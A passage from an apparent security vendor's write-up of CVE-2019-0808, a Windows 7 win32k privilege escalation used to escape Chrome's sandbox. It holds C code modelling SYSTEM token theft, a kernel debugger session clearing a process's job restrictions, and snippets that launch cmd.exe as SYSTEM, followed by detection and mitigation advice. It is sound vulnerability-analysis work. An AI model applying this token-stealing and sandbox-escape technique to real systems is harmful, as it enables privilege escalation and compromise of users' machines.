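    uint32_t pid;    /* UniqueProcessId */
    ListEntry links; /* ActiveProcessLinks */
    uint32_t token;  /* Token */
    uint32_t job;    /* Job */
} ProcModel;

/* Recovers the process from a pointer to its embedded list entry,
 * the same job that "sub eax, 0B8h" does in the shellcode. */
#define PROC_FROM_LINKS(entry) \
    ((ProcModel *)((char *)(entry) - offsetof(ProcModel, links)))

static int steal_system_token(ProcModel *current)
{
    assert(current != NULL);
    ProcModel *p = current;
    current->job = 0; /* drop the job association first */
    do {
        p = PROC_FROM_LINKS(p->links.flink);
        if (p->pid == 4) {             /* SYSTEM process */
            current->token = p->token; /* copy its token */
            return 1;
        }
    } while (p != current);
    return 0; /* PID 4 was not found in the list */
}
```

The order matches the assembly: the Job pointer is cleared before the list walk, and the token is replaced only once the entry with PID 4 has been located.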

To better understand the importance of NULLing the job object, examine the following !process output for a normal Chrome renderer process. Notice that the Job field is filled in, so the job object restrictions are currently being applied to the process.

0: kd> !process C54

Searching for Process with Cid == c54

PROCESS 859b8b40 SessionId: 2 Cid: 0c54 Peb: 7ffd9000 ParentCid: 0f30

DirBase: bf2f2cc0 ObjectTable: 8258f0d8 HandleCount: 213.

Image: chrome.exe

VadRoot 859b9e50 Vads 182 Clone 0 Private 2519. Modified 718. Locked 0.

DeviceMap 9abe5608

Token a6fccc58

ElapsedTime 00:00:18.588

UserTime 00:00:00.000

KernelTime 00:00:00.000

QuotaPoolUsage[PagedPool] 351516

QuotaPoolUsage[NonPagedPool] 11080

Working Set Sizes (now,min,max) (9035, 50, 345) (36140KB, 200KB, 1380KB)

PeakWorkingSetSize 9730

VirtualSize 734 Mb

PeakVirtualSize 740 Mb

PageFaultCount 12759

MemoryPriority BACKGROUND

BasePriority 8

CommitCharge 5378

Job 859b3ec8

THREAD 859801e8 Cid 0c54.08e8 Teb: 7ffdf000 Win32Thread: fe118dc8 WAIT: (UserRequest) UserMode Non-Alertable

859c6dc8 SynchronizationEvent





To confirm these restrictions are indeed in place, one can examine this process in Process Explorer, which confirms that the job contains a number of restrictions, such as prohibiting the spawning of child processes.

If the Job field within the process’s EPROCESS structure is set to NULL, WinDBG’s !process command no longer associates a job with the process.

1: kd> dt nt!_EPROCESS 859b8b40 Job

+0x124 Job : 0x859b3ec8 _EJOB

1: kd> dd 859b8b40+0x124

859b8c64 859b3ec8 99c4d988 00fd0000 c512eacc

859b8c74 00000000 00000000 00000070 00000f30

859b8c84 00000000 00000000 00000000 9abe5608

859b8c94 00000000 7ffaf000 00000000 00000000

859b8ca4 00000000 a4e89000 6f726863 652e656d

859b8cb4 00006578 01000000 859b3ee0 859b3ee0

859b8cc4 00000000 85980450 85947298 00000000

859b8cd4 862f2cc0 0000000e 265e67f7 00008000

1: kd> ed 859b8c64 0

1: kd> dd 859b8b40+0x124

859b8c64 00000000 99c4d988 00fd0000 c512eacc

859b8c74 00000000 00000000 00000070 00000f30

859b8c84 00000000 00000000 00000000 9abe5608

859b8c94 00000000 7ffaf000 00000000 00000000

859b8ca4 00000000 a4e89000 6f726863 652e656d

859b8cb4 00006578 01000000 859b3ee0 859b3ee0

859b8cc4 00000000 85980450 85947298 00000000

859b8cd4 862f2cc0 0000000e 265e67f7 00008000

1: kd> dt nt!_EPROCESS 859b8b40 Job

+0x124 Job : (null)

1: kd> !process C54

Searching for Process with Cid == c54

PROCESS 859b8b40 SessionId: 2 Cid: 0c54 Peb: 7ffd9000 ParentCid: 0f30

DirBase: bf2f2cc0 ObjectTable: 8258f0d8 HandleCount: 214.

Image: chrome.exe

VadRoot 859b9e50 Vads 180 Clone 0 Private 2531. Modified 720. Locked 0.

DeviceMap 9abe5608

Token a6fccc58

ElapsedTime 00:14:15.066

UserTime 00:00:00.015

KernelTime 00:00:00.000

QuotaPoolUsage[PagedPool] 351132

QuotaPoolUsage[NonPagedPool] 10960

Working Set Sizes (now,min,max) (9112, 50, 345) (36448KB, 200KB, 1380KB)

PeakWorkingSetSize 9730

VirtualSize 733 Mb

PeakVirtualSize 740 Mb

PageFaultCount 12913

MemoryPriority BACKGROUND

BasePriority 4

CommitCharge 5355

THREAD 859801e8 Cid 0c54.08e8 Teb: 7ffdf000 Win32Thread: fe118dc8 WAIT: (UserRequest) UserMode Non-Alertable

859c6dc8 SynchronizationEvent



Examining Process Explorer once again confirms that since the Job field in the Chrome renderer’s EPROCESS structure has been NULL’d out, there is no longer any job associated with the Chrome renderer process. This can be seen in the following screenshot, which shows that the Job tab is no longer available for the Chrome renderer process, which means it can now spawn any child process it wishes.

Spawning the New Process

Once Shellcode() finishes executing, WindowHookProc() will conduct a check to see if the variable success was set to TRUE, indicating that the exploit completed successfully. If it has, then it will print out a success message before returning execution to main().

if (success == TRUE) {

printf("[*] Successfully exploited the program and triggered the shellcode!\r\n");

}

else {

printf("[!] Didn't exploit the program. For some reason our privileges were not appropriate.\r\n");

ExitProcess(-1);

}

main() will exit its window message handling loop since there are no more messages to be processed and will then perform a check to see if success is set to TRUE. If it is, then a call to WinExec() will be performed to execute cmd.exe with SYSTEM privileges using the stolen SYSTEM token.

// Execute command if exploit success.

if (success == TRUE) {

WinExec("cmd.exe", 1);

}

Demo Video

The following video demonstrates how this vulnerability was combined with István Kurucsai’s exploit for CVE-2019-5786 to form the fully working exploit chain described in Google’s blog post. Notice the attacker can spawn arbitrary commands as the SYSTEM user from Chrome despite the limitations of the Chrome sandbox.

Code for the full exploit chain can be found on GitHub:

https://github.com/exodusintel/CVE-2019-0808

Detection

Detection of exploitation attempts can be performed by examining user mode applications to see if they make any calls to CreateWindow() or CreateWindowEx() with an lpClassName parameter of “#32768”. Any user mode applications which exhibit this behavior are likely malicious since the class string “#32768” is reserved for system use, and should therefore be subject to further inspection.
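A detection rule along these lines could be prototyped as a simple predicate over the lpClassName argument. The sketch below is hypothetical and not taken from any product: the function name is invented, and it assumes that a class name passed as an integer atom with the value 0x8000 refers to the same class as the string “#32768”.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Returns nonzero if class_name refers to the system menu window class,
 * either as the string "#32768" or as an integer atom (assumed 0x8000). */
static int is_reserved_menu_class(const char *class_name)
{
    uintptr_t raw = (uintptr_t)class_name;
    if ((raw >> 16) == 0) {
        /* A value below 0x10000 is treated as an atom, not a string pointer. */
        return raw == 0x8000u;
    }
    return strcmp(class_name, "#32768") == 0;
}
```

A monitoring hook would call such a predicate on every CreateWindow() or CreateWindowEx() call made by a user mode application and flag any match for further inspection.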

Mitigation

Running Windows 8 or higher prevents attackers from exploiting this issue, since Windows 8 and later prevent applications from mapping the first 64 KB of memory (as mentioned on slide 33 of Matt Miller’s 2012 BlackHat slide deck). Attackers therefore cannot allocate the NULL page or memory near it, such as address 0x30. Additionally, upgrading to Windows 8 or higher allows Chrome’s sandbox to block all calls to win32k.sys, thereby preventing the attacker from calling NtUserMNDragOver() to trigger this vulnerability.

On Windows 7, the only possible mitigation is to apply KB4489878 or KB4489885, which can be downloaded from the links in the CVE-2019-0808 advisory page.

Conclusion

Developing a Chrome sandbox escape requires a number of conditions to be met. However, by combining the right exploit with the limited mitigations of Windows 7, it was possible to build a working sandbox escape from a bug in win32k.sys to illustrate the 0-day exploit chain originally described in Google’s blog post.

Timely and detailed vulnerability analysis is one of the benefits of an Exodus nDay Subscription. This subscription also allows offensive groups to test mitigating controls and detection and response functions within their organisations. Corporate SOC/NOC groups also make use of our nDay Subscription to keep watch on critical assets.